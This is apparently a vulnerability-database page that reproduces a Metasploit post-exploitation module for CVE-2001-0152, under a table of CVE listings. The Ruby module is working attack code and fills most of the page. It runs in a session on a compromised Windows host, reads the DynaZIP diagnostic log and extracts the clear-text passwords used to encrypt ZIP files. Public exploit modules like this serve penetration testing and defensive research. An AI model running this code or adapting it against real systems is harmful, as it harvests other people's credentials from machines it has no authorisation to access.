| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2001-0152 | 29 May 201815:50 | – | circl | |
| CVE-2001-0152 | 7 May 200104:00 | – | cve | |
| CVE-2001-0152 | 7 May 200104:00 | – | cvelist | |
| EUVD-2001-0152 | 7 Oct 202500:30 | – | euvd | |
| CVE-2001-0152 | 3 May 200104:00 | – | nvd |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Gather DynaZIP Saved Password Extraction',
'Description' => %q{
This module extracts clear text credentials from dynazip.log.
The log file contains passwords used to encrypt compressed zip
files in Microsoft Plus! 98 and Windows Me.
},
'License' => MSF_LICENSE,
'Author' => ['bcoles'],
'References' => [
['CVE', '2001-0152'],
['MSB', 'MS01-019'],
['PACKETSTORM', '24543'],
['URL', 'https://support.microsoft.com/en-us/kb/265131']
],
'DisclosureDate' => '2001-03-27',
'Platform' => ['win'],
'SessionTypes' => ['meterpreter', 'shell']
)
)
end
def run
creds = []
log_path = "#{get_env('%WINDIR%')}\\dynazip.log"
unless file?(log_path)
print_error("#{log_path} not found")
return
end
print_good("Found DynaZip log file: #{log_path}")
begin
log_data = read_file(log_path)
rescue EOFError
print_error('Log file is empty')
return
end
vprint_status("Processing log file (#{log_data.length} bytes)")
log_data.split('- DynaZIP ZIP Diagnostic Log -').each do |log|
if log =~ /^lpszZIPFile: 0x[0-9a-f]+\s*?^(.+)\r\n/
zip_path = ::Regexp.last_match(1)
else
next
end
vprint_status("Processing log entry for #{zip_path}")
# The lpszEncryptCode appears to always be 0x712185d4 however
# we use a hex regex pattern, just in case.
# The line following the lpszEncryptCode contains the password.
passwd = log.scan(/^lpszEncryptCode: 0x[0-9a-f]+\s*?^(.+)?\r\n/).flatten.first
# In the event that the user selected a blank encryption password
# the ZIP file is not encrypted, however an empty line is written
# to the log file.
if passwd.to_s.eql?('')
vprint_status('Did not find a password')
next
end
print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
creds << [zip_path, passwd]
end
if creds.empty?
print_error('No passwords were found in the log file')
return
end
table = Rex::Text::Table.new(
'Header' => 'ZIP Passwords',
'Indent' => 0,
'SortIndex' => 0,
'Columns' => ['File Path', 'Password']
)
creds.each { |c| table << c }
print_line
print_line(table.to_s)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation